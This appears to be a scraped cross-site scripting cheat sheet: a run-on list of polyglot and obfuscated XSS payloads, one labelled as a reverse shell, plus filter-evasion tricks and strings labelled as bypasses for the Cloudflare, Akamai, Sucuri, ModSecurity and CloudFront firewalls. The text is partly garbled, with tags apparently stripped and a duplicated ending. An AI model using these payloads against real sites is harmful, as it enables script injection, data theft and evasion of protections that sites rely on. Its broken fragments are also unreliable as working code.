jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e Hi'>" "> <--` --!> " autofocus onfocus=alert(4) fragment=" " onclick=alert`5` fragment=" >"@yahoo.com "'`> ๐='',๐บ=!๐+๐,๐=!๐บ+๐,๐บ=๐+{},๐=๐บ[๐++], ๐=๐บ[๐ซ=๐],๐=++๐ซ+๐,๐น=๐บ[๐ซ+๐],๐บ[๐น+=๐บ[๐] +(๐บ.๐+๐บ)[๐]+๐[๐]+๐+๐+๐บ[๐ซ]+๐น+๐+๐บ[๐] +๐][๐น](๐[๐]+๐[๐ซ]+๐บ[๐]+๐+๐+"(๐)")() ==> reverse Shell --> test it "> --> ModSecurity bypass javascript:alert(1) '-alert(1)-' '-alert(1)// `-alert(1)//\ \'-alert(1)// '}alert(1);{' '}alert(1)%0A{' \'}alert(1);{// \u0027-confirm`1`-\u0027 "; ||confirm('XSS') || " '*prompt(1)*' ${alert(1)} {{32*32}} ""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y "])},alert(1));(function xss() {// '?prompt`1`?' " onmouseover=alert(/@darknetguy/) " onclick=alert(1)//">click " autofocus onfocus=alert(1) " " onfocus=prompt(1) autofocus fragment=" " onfocus=prompt(1) onmouseover="confirm(1) " style="position:absolute;width:100%;height:100%;top:0;left:0;" " onmousemove=alert(/@darknetguy/)//">Milad ">.gif http://www..com ">"@yahoo.com xss xss " test=" bypass alert filter: (alert)(1) a=alert,a(2) [3].find(alert) al\u0065rt(4) alert`5` [6].map(alert) [7].every(alert) [8].filter(alert) [9].findIndex(alert) [10].forEach(alert) self['alert'](11) parent['alert'](12) window['alert'](13) Wordfence 7.4.2 Sucuri CloudProxy (POST only) ModSecurity CRS 3.2.0 PL1 and end of url ==> #alert("testtesttestets") %>/ alert(2) / ---> cloudflare {`XSSยด} ยซbyPASSยป / ===> send current page's source to attacker site ===> use < diffrent way ">'> ===> maybe WAF bypasser (Test it) // ===> Bypass CloudFront WAF %3c maybe WAF bypasser (Test it) ===> maybe WAF bypasser (Test it) "> ==> Sucuri WAF XSS bypass <--` --!> ===> CloudFront XSS bypass 1'"> ===> Cloudflare #XSS #Bypass via dot ===> bypass if comments are allowed ** ๐๐ธ๐ฎ๐บ๐ฎ๐ถ [๐๐ข๐ก๐ ๐ฆ๐ถ๐๐ฒ ๐๐ฒ๐ณ๐ฒ๐ป๐ฑ๐ฒ๐ฟ] ๐ช๐๐ ๐๐๐ฝ๐ฎ๐๐ ** XSS Me# X ==> Cloudflare Bypass javascript:โ/*โ/*`/* โ ===> Akamai waf bypass */alert()/* XSS'\x22"%22>4<%\u0022/* ===> locator! parentheses free payload by @aemkei <script>alert()</script> < %3c script>alert()<</script #Akamai #Bypass #XSS #BugBounty Found a working #xss payload after a brainstorming for a long #time. #Tested in many sites with alexa ranking below #1000 Cloudflare WAF working again... Dec: Hex: One to bypass Cloudflare WAF by @JacksonHHax < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
*/alert()/* XSS'\x22"%22>4<%\u0022/* ===> locator! parentheses free payload by @aemkei <script>alert()</script> < %3c script>alert()<</script #Akamai #Bypass #XSS #BugBounty Found a working #xss payload after a brainstorming for a long #time. #Tested in many sites with alexa ranking below #1000 Cloudflare WAF working again... Dec: Hex: One to bypass Cloudflare WAF by @JacksonHHax < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C